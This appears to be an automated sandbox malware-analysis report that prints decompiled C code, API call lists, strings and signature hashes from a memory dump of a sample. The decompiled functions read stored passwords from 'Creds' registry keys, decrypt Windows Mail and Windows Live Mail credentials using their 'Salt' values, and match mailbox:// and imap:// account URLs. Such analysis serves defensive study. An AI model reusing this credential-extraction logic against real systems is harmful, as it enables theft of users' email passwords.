                                                                                                                                                                  0x0040ba5f
                                                                                                                                                                  0x0040ba5f
                                                                                                                                                                  0x0040ba47
                                                                                                                                                                  0x0040ba49
                                                                                                                                                                  0x0040ba4a
                                                                                                                                                                  0x0040ba4a
                                                                                                                                                                  0x0040ba32
                                                                                                                                                                  0x0040ba34
                                                                                                                                                                  0x0040ba35
                                                                                                                                                                  0x0040ba35

                                                                                                                                                                  APIs
                                                                                                                                                                  • _stricmp.MSVCRT(/shtml,0041344F,0040BB20,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BA27
                                                                                                                                                                  • _stricmp.MSVCRT(/sverhtml,0041344F,0040BB20,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BA3C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _stricmp
                                                                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                  • API String ID: 2884411883-1959339147
                                                                                                                                                                  • Opcode ID: b70f27fc5aecc47ba7919a44c3d765b9763ae409b21ddab941f54064ab36d7b0
                                                                                                                                                                  • Instruction ID: 9cc75f2135a457fb5b155108ec4f1482e5c4f70433a9f240ecae405c43e57cbb
                                                                                                                                                                  • Opcode Fuzzy Hash: b70f27fc5aecc47ba7919a44c3d765b9763ae409b21ddab941f54064ab36d7b0
                                                                                                                                                                  • Instruction Fuzzy Hash: 0401DE7238A31128F934A1A63E17BD30A44CBE1B7AF30465BF555E41C1EF9D949094AC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F8B4, Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 114stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E0040F8B4(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void _v771;
				char _v772;
				void _v1027;
				char _v1028;
				char _v1284;
				char _v2308;
				char _t47;
				intOrPtr* _t50;
				void* _t57;
				intOrPtr* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;

				_v1028 = 0;
				memset( &_v1027, 0, 0xfe);
				_v772 = 0;
				memset( &_v771, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t77 = _t76 + 0x24;
				if(_a16 != 0xffffffff) {
					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F6E2(_a16,  &_v1284));
					_t77 = _t77 + 0x14;
				}
				if(_a20 != 0xffffffff) {
					sprintf( &_v772, "<font color=\"%s\">", E0040F6E2(_a20,  &_v1284));
					strcpy( &_v516, "</font>");
					_t77 = _t77 + 0x1c;
				}
				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
				E00405F07(_a4,  &_v2308);
				_t47 = _a12;
				_t78 = _t77 + 0x14;
				if(_t47 > 0) {
					_t73 = _a8 + 4;
					_a16 = _t47;
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						_t50 =  *_t73;
						_t79 = _t78 + 0xc;
						if( *_t50 == 0) {
							_v260 = 0;
						} else {
							sprintf( &_v260, " width=\"%s\"", _t50);
							_t79 = _t79 + 0xc;
						}
						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
						_t57 = E00405F07(_a4,  &_v2308);
						_t78 = _t79 + 0x20;
						_t73 = _t73 + 8;
						_t34 =  &_a16;
						 *_t34 = _a16 - 1;
					} while ( *_t34 != 0);
					return _t57;
				}
				return _t47;
			}





















                                                                                                                                                                  0x0040f8cf
                                                                                                                                                                  0x0040f8d5
                                                                                                                                                                  0x0040f8e3
                                                                                                                                                                  0x0040f8e9
                                                                                                                                                                  0x0040f8f7
                                                                                                                                                                  0x0040f8fd
                                                                                                                                                                  0x0040f902
                                                                                                                                                                  0x0040f909
                                                                                                                                                                  0x0040f927
                                                                                                                                                                  0x0040f92c
                                                                                                                                                                  0x0040f92c
                                                                                                                                                                  0x0040f933
                                                                                                                                                                  0x0040f951
                                                                                                                                                                  0x0040f962
                                                                                                                                                                  0x0040f967
                                                                                                                                                                  0x0040f967
                                                                                                                                                                  0x0040f97d
                                                                                                                                                                  0x0040f98c
                                                                                                                                                                  0x0040f991
                                                                                                                                                                  0x0040f994
                                                                                                                                                                  0x0040f999
                                                                                                                                                                  0x0040f9a3
                                                                                                                                                                  0x0040f9a6
                                                                                                                                                                  0x0040f9a9
                                                                                                                                                                  0x0040f9b2
                                                                                                                                                                  0x0040f9b8
                                                                                                                                                                  0x0040f9bd
                                                                                                                                                                  0x0040f9bf
                                                                                                                                                                  0x0040f9c4
                                                                                                                                                                  0x0040f9dd
                                                                                                                                                                  0x0040f9c6
                                                                                                                                                                  0x0040f9d3
                                                                                                                                                                  0x0040f9d8
                                                                                                                                                                  0x0040f9d8
                                                                                                                                                                  0x0040fa07
                                                                                                                                                                  0x0040fa16
                                                                                                                                                                  0x0040fa1b
                                                                                                                                                                  0x0040fa1e
                                                                                                                                                                  0x0040fa21
                                                                                                                                                                  0x0040fa21
                                                                                                                                                                  0x0040fa21
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fa26
                                                                                                                                                                  0x0040fa2a

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: sprintf$memset$strcpy
                                                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                  • API String ID: 898937289-3842416460
                                                                                                                                                                  • Opcode ID: 545e006f70f27d5e232efb2f2e670bdaa3235a9e542d9c48a27740188541449b
                                                                                                                                                                  • Instruction ID: e1dfaf3f0aab17dcf8878a0a22dd94d4c671af1ddc0a59b8f6102d88430d0a7a
                                                                                                                                                                  • Opcode Fuzzy Hash: 545e006f70f27d5e232efb2f2e670bdaa3235a9e542d9c48a27740188541449b
                                                                                                                                                                  • Instruction Fuzzy Hash: F94133B2C4111D6EDB21DA54CD41FEB776CEF54348F0401BBB618E2142E2789F988F69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040DD59, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 118registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E0040DD59(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
				int _v8;
				int _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char* _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				int _v44;
				void _v299;
				char _v300;
				char _v556;
				char _v812;
				char _v4908;
				void* __ebx;
				void* __edi;
				long _t46;
				int* _t84;
				char* _t85;

				E00412360(0x132c, __ecx);
				_t1 =  &_a16; // 0x40e170
				_t84 = 0;
				_t2 =  &_a16; // 0x40e170
				_t46 = RegOpenKeyExA( *_t2, "Creds", 0, 0x20019, _t1);
				if(_t46 != 0) {
					return _t46;
				}
				_v300 = _t46;
				memset( &_v299, 0, 0xff);
				_push(0xff);
				_push( &_v300);
				_v8 = 0;
				_push(0);
				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
						_v12 = 0x1000;
						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
							_v32 = _v12;
							_v28 =  &_v4908;
							_v40 = _a12;
							_v36 = _a8;
							if(E0040481B(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
								_t85 =  &_v812;
								_v812 = 0;
								_v556 = 0;
								E004060DA(0xff, _t85,  &_v300);
								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
								 *((intOrPtr*)( *_a4))(_t85);
								LocalFree(_v20);
								_t84 = 0;
							}
						}
						RegCloseKey(_v16);
					}
					_v8 = _v8 + 1;
					_push(0xff);
					_push( &_v300);
					_push(_v8);
				}
				return RegCloseKey(_a16);
			}























                                                                                                                                                                  0x0040dd61
                                                                                                                                                                  0x0040dd6f
                                                                                                                                                                  0x0040dd78
                                                                                                                                                                  0x0040dd80
                                                                                                                                                                  0x0040dd83
                                                                                                                                                                  0x0040dd87
                                                                                                                                                                  0x0040dec0
                                                                                                                                                                  0x0040dec0
                                                                                                                                                                  0x0040dd93
                                                                                                                                                                  0x0040dda1
                                                                                                                                                                  0x0040dda9
                                                                                                                                                                  0x0040ddb0
                                                                                                                                                                  0x0040ddb1
                                                                                                                                                                  0x0040ddb4
                                                                                                                                                                  0x0040dea2
                                                                                                                                                                  0x0040ddd2
                                                                                                                                                                  0x0040ddf0
                                                                                                                                                                  0x0040ddff
                                                                                                                                                                  0x0040de08
                                                                                                                                                                  0x0040de11
                                                                                                                                                                  0x0040de17
                                                                                                                                                                  0x0040de1d
                                                                                                                                                                  0x0040de39
                                                                                                                                                                  0x0040de42
                                                                                                                                                                  0x0040de48
                                                                                                                                                                  0x0040de4f
                                                                                                                                                                  0x0040de56
                                                                                                                                                                  0x0040de70
                                                                                                                                                                  0x0040de7e
                                                                                                                                                                  0x0040de83
                                                                                                                                                                  0x0040de89
                                                                                                                                                                  0x0040de89
                                                                                                                                                                  0x0040de39
                                                                                                                                                                  0x0040de8e
                                                                                                                                                                  0x0040de8e
                                                                                                                                                                  0x0040de94
                                                                                                                                                                  0x0040de97
                                                                                                                                                                  0x0040de9e
                                                                                                                                                                  0x0040de9f
                                                                                                                                                                  0x0040de9f
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(p@,Creds,00000000,00020019,p@,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040E170,?,?,?,?), ref: 0040DD83
                                                                                                                                                                  • memset.MSVCRT ref: 0040DDA1
                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040DDCE
                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?,?,?), ref: 0040DDF7
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,?,00000000,000000FF,00000000,00000000), ref: 0040DE70
                                                                                                                                                                  • LocalFree.KERNEL32(00000001), ref: 0040DE83
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040DE8E
                                                                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040DEA5
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040DEB6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password$p@
                                                                                                                                                                  • API String ID: 551151806-2386532916
                                                                                                                                                                  • Opcode ID: 802061c58ab3b7a0c699a15447d727f2b4d3045fa72b958aab0169898b6b1aff
                                                                                                                                                                  • Instruction ID: 9b96f835ed6997495325440ed53231f0f0ace883948e60a6f3a7b66043991938
                                                                                                                                                                  • Opcode Fuzzy Hash: 802061c58ab3b7a0c699a15447d727f2b4d3045fa72b958aab0169898b6b1aff
                                                                                                                                                                  • Instruction Fuzzy Hash: 61410676900219AFDB11DFA5DC84EEFBBBCEB48755F0040A6F905E2150DA34AB948B64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E74B, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040E74B() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x418518 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryA("psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
					 *0x417fec = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x417fe4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
							 *0x417fdc = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x41810c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x417fe8 = _t2;
									if(_t2 != 0) {
										 *0x418518 = 1;
									}
								}
							}
						}
					}
					if( *0x418518 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}






                                                                                                                                                                  0x0040e752
                                                                                                                                                                  0x0040e7e2
                                                                                                                                                                  0x0040e7e2
                                                                                                                                                                  0x0040e75e
                                                                                                                                                                  0x0040e764
                                                                                                                                                                  0x0040e768
                                                                                                                                                                  0x0040e7e1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e76a
                                                                                                                                                                  0x0040e777
                                                                                                                                                                  0x0040e77b
                                                                                                                                                                  0x0040e780
                                                                                                                                                                  0x0040e788
                                                                                                                                                                  0x0040e78c
                                                                                                                                                                  0x0040e791
                                                                                                                                                                  0x0040e799
                                                                                                                                                                  0x0040e79d
                                                                                                                                                                  0x0040e7a2
                                                                                                                                                                  0x0040e7aa
                                                                                                                                                                  0x0040e7ae
                                                                                                                                                                  0x0040e7b3
                                                                                                                                                                  0x0040e7bb
                                                                                                                                                                  0x0040e7bf
                                                                                                                                                                  0x0040e7c4
                                                                                                                                                                  0x0040e7c6
                                                                                                                                                                  0x0040e7c6
                                                                                                                                                                  0x0040e7c4
                                                                                                                                                                  0x0040e7b3
                                                                                                                                                                  0x0040e7a2
                                                                                                                                                                  0x0040e791
                                                                                                                                                                  0x0040e7d8
                                                                                                                                                                  0x0040e7db
                                                                                                                                                                  0x0040e7db
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040e7d8

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040E370), ref: 0040E75E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E777
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E788
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E799
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E7AA
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E7BB
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0040E7DB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                  • API String ID: 2449869053-232097475
                                                                                                                                                                  • Opcode ID: 84e491b4529d3412f2215207142cb03e9d322bcacbabb572ff9b82cad9202ccb
                                                                                                                                                                  • Instruction ID: 4da247ea616dd2a72ab7006308dc9c89d3535959c96c16615461c58e29f3e28a
                                                                                                                                                                  • Opcode Fuzzy Hash: 84e491b4529d3412f2215207142cb03e9d322bcacbabb572ff9b82cad9202ccb
                                                                                                                                                                  • Instruction Fuzzy Hash: B8012530645211AAC711DB266C81FA73DF99B85B80F15843FF400F2694DB7CC5529A6C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00410BCE, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136stringregistryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E00410BCE(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v6;
				char _v7;
				char _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				short* _v24;
				unsigned int _v28;
				char* _v32;
				int _v36;
				intOrPtr _v40;
				signed int _v44;
				void _v299;
				char _v300;
				void _v555;
				char _v556;
				char _v1080;
				void* __esi;
				int _t56;
				intOrPtr _t58;
				intOrPtr _t64;
				char _t92;
				char* _t93;
				void* _t100;
				signed int _t102;
				signed int _t107;
				intOrPtr _t108;
				void* _t113;

				_t113 = __eflags;
				_t100 = __edx;
				_t93 = __eax;
				E004046E1( &_v1080);
				if(E004047AA( &_v1080, _t113) != 0) {
					_t56 = strlen(_t93);
					asm("cdq");
					_t107 = _t56 - _t100 >> 1;
					_t2 = _t107 + 1; // 0x1
					_t58 = _t2;
					L00412090();
					_t102 = 0;
					_t96 = _t58;
					_v16 = _t58;
					if(_t107 > 0) {
						do {
							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
							_v7 = _t93[1 + _t102 * 2];
							_v6 = 0;
							_t92 = E00406541( &_v8);
							_t96 = _v16;
							 *((char*)(_t102 + _v16)) = _t92;
							_t102 = _t102 + 1;
						} while (_t102 < _t107);
					}
					_v556 = 0;
					memset( &_v555, 0, 0xff);
					_v12 = 0;
					_v300 = 0;
					memset( &_v299, 0, 0xfe);
					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
					if(_t64 != 1) {
						__eflags = _t64 - 2;
						if(_t64 == 2) {
							_push("Software\\Microsoft\\Windows Live Mail");
							goto L7;
						}
					} else {
						_push("Software\\Microsoft\\Windows Mail");
						L7:
						strcpy( &_v300, ??);
						_pop(_t96);
					}
					if(E0040F1B0(0x80000001,  &_v300,  &_v20) == 0) {
						_v12 = 0xff;
						E0040F214(_t96, _v20, "Salt",  &_v556,  &_v12);
						RegCloseKey(_v20);
					}
					_v40 = _v16;
					_v36 = _v12;
					_v32 =  &_v556;
					_v44 = _t107;
					if(E0040481B( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
						_t108 = _a8;
						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
						(_t108 + 0x400)[_v28 >> 1] = 0;
						LocalFree(_v24);
					}
					_push(_v16);
					L00412096();
				}
				return E004047FB( &_v1080);
			}































                                                                                                                                                                  0x00410bce
                                                                                                                                                                  0x00410bce
                                                                                                                                                                  0x00410bdf
                                                                                                                                                                  0x00410be1
                                                                                                                                                                  0x00410bed
                                                                                                                                                                  0x00410bf5
                                                                                                                                                                  0x00410bfa
                                                                                                                                                                  0x00410bff
                                                                                                                                                                  0x00410c01
                                                                                                                                                                  0x00410c01
                                                                                                                                                                  0x00410c05
                                                                                                                                                                  0x00410c0b
                                                                                                                                                                  0x00410c0f
                                                                                                                                                                  0x00410c10
                                                                                                                                                                  0x00410c13
                                                                                                                                                                  0x00410c15
                                                                                                                                                                  0x00410c18
                                                                                                                                                                  0x00410c1f
                                                                                                                                                                  0x00410c26
                                                                                                                                                                  0x00410c2a
                                                                                                                                                                  0x00410c30
                                                                                                                                                                  0x00410c33
                                                                                                                                                                  0x00410c36
                                                                                                                                                                  0x00410c37
                                                                                                                                                                  0x00410c15
                                                                                                                                                                  0x00410c4a
                                                                                                                                                                  0x00410c51
                                                                                                                                                                  0x00410c65
                                                                                                                                                                  0x00410c68
                                                                                                                                                                  0x00410c6e
                                                                                                                                                                  0x00410c76
                                                                                                                                                                  0x00410c82
                                                                                                                                                                  0x00410c8b
                                                                                                                                                                  0x00410c8e
                                                                                                                                                                  0x00410c90
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00410c90
                                                                                                                                                                  0x00410c84
                                                                                                                                                                  0x00410c84
                                                                                                                                                                  0x00410c95
                                                                                                                                                                  0x00410c9c
                                                                                                                                                                  0x00410ca2
                                                                                                                                                                  0x00410ca2
                                                                                                                                                                  0x00410cbd
                                                                                                                                                                  0x00410cd2
                                                                                                                                                                  0x00410cd5
                                                                                                                                                                  0x00410ce0
                                                                                                                                                                  0x00410ce0
                                                                                                                                                                  0x00410ce9
                                                                                                                                                                  0x00410cef
                                                                                                                                                                  0x00410cf8
                                                                                                                                                                  0x00410d0d
                                                                                                                                                                  0x00410d17
                                                                                                                                                                  0x00410d19
                                                                                                                                                                  0x00410d31
                                                                                                                                                                  0x00410d3c
                                                                                                                                                                  0x00410d46
                                                                                                                                                                  0x00410d46
                                                                                                                                                                  0x00410d4c
                                                                                                                                                                  0x00410d4f
                                                                                                                                                                  0x00410d55
                                                                                                                                                                  0x00410d64

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
                                                                                                                                                                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                  • strlen.MSVCRT ref: 00410BF5
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00410C05
                                                                                                                                                                  • memset.MSVCRT ref: 00410C51
                                                                                                                                                                  • memset.MSVCRT ref: 00410C6E
                                                                                                                                                                  • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00410C9C
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00410CE0
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410D31
                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00410D46
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00410D4F
                                                                                                                                                                    • Part of subcall function 00406541: strtoul.MSVCRT ref: 00406549
                                                                                                                                                                  Strings
                                                                                                                                                                  • Software\Microsoft\Windows Mail, xrefs: 00410C84
                                                                                                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 00410C90
                                                                                                                                                                  • Salt, xrefs: 00410CCA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                  • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                  • API String ID: 1673043434-2687544566
                                                                                                                                                                  • Opcode ID: 342b62813bf58c369db31d81dd449ebf5665bdc31e2008f4eea2573a64a7df1c
                                                                                                                                                                  • Instruction ID: 35ff079a9a2d20c7a5c67e942e04d515760747927ccc6212efb4229f933df569
                                                                                                                                                                  • Opcode Fuzzy Hash: 342b62813bf58c369db31d81dd449ebf5665bdc31e2008f4eea2573a64a7df1c
                                                                                                                                                                  • Instruction Fuzzy Hash: 94419876D0021DAECB11DBA5DC41ADEBBBCAF48304F0441ABEA45F3241DA74DB85CB68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040CD82, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E0040CD82(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void _v619;
				char _v620;
				void _v1231;
				char _v1232;
				void* __edi;
				void* _t37;
				void* _t53;
				char* _t54;
				intOrPtr _t60;
				void* _t61;
				char* _t62;
				void* _t67;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t87;
				void* _t88;
				void* _t89;

				_t87 = _a4;
				_t84 = __ecx;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
					_t37 = 0;
				} else {
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
				}
				_push(0xa);
				_push("mailbox://");
				_push(_t37);
				L004120D2();
				_t89 = _t88 + 0xc;
				if(_t37 == 0) {
					L8:
					_a4 = 0;
					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
						while(1) {
							_t85 = E0040DA96(_a4, _t84 + 0x468);
							_v620 = 0;
							memset( &_v619, 0, 0x261);
							_v1232 = 0;
							memset( &_v1231, 0, 0x261);
							_t17 = _t85 + 0x104; // 0x104
							_t18 = _t85 + 0x204; // 0x204
							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
							_t20 = _t85 + 0x104; // 0x104
							_t21 = _t85 + 0x204; // 0x204
							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
							_t53 = 0;
							_t89 = _t89 + 0x38;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t53);
							_t54 =  &_v620;
							_push(_t54);
							L00412072();
							if(_t54 == 0) {
								goto L17;
							}
							_t61 = 0;
							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
							}
							_push(_t61);
							_t62 =  &_v1232;
							_push(_t62);
							L00412072();
							if(_t62 != 0) {
								L18:
								_a4 = _a4 + 1;
								_t60 = _v8;
								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
									_t84 = _t60;
									continue;
								} else {
								}
							} else {
								goto L17;
							}
							goto L21;
							L17:
							if( *((char*)(E00406B3E( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
								E0040132A(_t57 + 1, _t85 + 0x304, 0xff);
							} else {
								goto L18;
							}
							goto L21;
						}
					}
				} else {
					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
						_t67 = 0;
					} else {
						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
					}
					_push(7);
					_push("imap://");
					_push(_t67);
					L004120D2();
					_t89 = _t89 + 0xc;
					if(_t67 == 0) {
						goto L8;
					}
				}
				L21:
				return 1;
			}





















                                                                                                                                                                  0x0040cd8d
                                                                                                                                                                  0x0040cd96
                                                                                                                                                                  0x0040cd98
                                                                                                                                                                  0x0040cd9b
                                                                                                                                                                  0x0040cda7
                                                                                                                                                                  0x0040cd9d
                                                                                                                                                                  0x0040cda2
                                                                                                                                                                  0x0040cda2
                                                                                                                                                                  0x0040cda9
                                                                                                                                                                  0x0040cdab
                                                                                                                                                                  0x0040cdb0
                                                                                                                                                                  0x0040cdb1
                                                                                                                                                                  0x0040cdb6
                                                                                                                                                                  0x0040cdbb
                                                                                                                                                                  0x0040cde6
                                                                                                                                                                  0x0040cdec
                                                                                                                                                                  0x0040cdef
                                                                                                                                                                  0x0040cdfe
                                                                                                                                                                  0x0040ce0d
                                                                                                                                                                  0x0040ce18
                                                                                                                                                                  0x0040ce1f
                                                                                                                                                                  0x0040ce2e
                                                                                                                                                                  0x0040ce35
                                                                                                                                                                  0x0040ce3a
                                                                                                                                                                  0x0040ce41
                                                                                                                                                                  0x0040ce54
                                                                                                                                                                  0x0040ce59
                                                                                                                                                                  0x0040ce60
                                                                                                                                                                  0x0040ce73
                                                                                                                                                                  0x0040ce78
                                                                                                                                                                  0x0040ce7a
                                                                                                                                                                  0x0040ce80
                                                                                                                                                                  0x0040ce87
                                                                                                                                                                  0x0040ce87
                                                                                                                                                                  0x0040ce8a
                                                                                                                                                                  0x0040ce8b
                                                                                                                                                                  0x0040ce91
                                                                                                                                                                  0x0040ce92
                                                                                                                                                                  0x0040ce9b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ce9d
                                                                                                                                                                  0x0040cea2
                                                                                                                                                                  0x0040cea9
                                                                                                                                                                  0x0040cea9
